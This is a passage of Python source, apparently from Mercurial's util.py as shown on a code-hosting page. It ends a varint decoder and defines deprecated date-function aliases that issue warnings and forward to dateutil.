        value |= (octet & 0x7f) << shift
        if octet & 0x80:
            # Continuation bit set: another byte follows.
            continue
        return value
4016 4016
###
# Deprecation warnings for util.py splitting
###

# Plain aliases of the dateutil attributes of the same names.
defaultdateformats = dateutil.defaultdateformats
extendeddateformats = dateutil.extendeddateformats
4024 4024
def makedate(*args, **kwargs):
    """Deprecated alias: warn, then forward to dateutil.makedate."""
    nouideprecwarn("'util.makedate' is deprecated, "
                   "use 'utils.dateutil.makedate'", "4.6")
    return dateutil.makedate(*args, **kwargs)
4030 4030
def datestr(*args, **kwargs):
    """Deprecated alias: warn, then forward to dateutil.datestr.

    All positional and keyword arguments are passed through unchanged and
    the result of dateutil.datestr is returned.
    """
    msg = ("'util.datestr' is deprecated, "
           "use 'utils.dateutil.datestr'")
    nouideprecwarn(msg, "4.6")
    # The deprecation warning is the only side effect, matching the other
    # date wrappers in this module.
    return dateutil.datestr(*args, **kwargs)
4037 4037
def shortdate(*args, **kwargs):
    """Deprecated alias: warn, then forward to dateutil.shortdate."""
    nouideprecwarn("'util.shortdate' is deprecated, "
                   "use 'utils.dateutil.shortdate'", "4.6")
    return dateutil.shortdate(*args, **kwargs)
4043 4043
def parsetimezone(*args, **kwargs):
    """Deprecated alias: warn, then forward to dateutil.parsetimezone."""
    nouideprecwarn("'util.parsetimezone' is deprecated, "
                   "use 'utils.dateutil.parsetimezone'", "4.6")
    return dateutil.parsetimezone(*args, **kwargs)
4049 4049
def strdate(*args, **kwargs):
    """Deprecated alias: warn, then forward to dateutil.strdate."""
    nouideprecwarn("'util.strdate' is deprecated, "
                   "use 'utils.dateutil.strdate'", "4.6")
    return dateutil.strdate(*args, **kwargs)
4055 4055
def parsedate(*args, **kwargs):
    """Deprecated alias: warn, then forward to dateutil.parsedate."""
    nouideprecwarn("'util.parsedate' is deprecated, "
                   "use 'utils.dateutil.parsedate'", "4.6")
    return dateutil.parsedate(*args, **kwargs)
4061 4061
def matchdate(*args, **kwargs):
    """Deprecated alias: warn, then forward to dateutil.matchdate."""
    nouideprecwarn("'util.matchdate' is deprecated, "
                   "use 'utils.dateutil.matchdate'", "4.6")
    return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now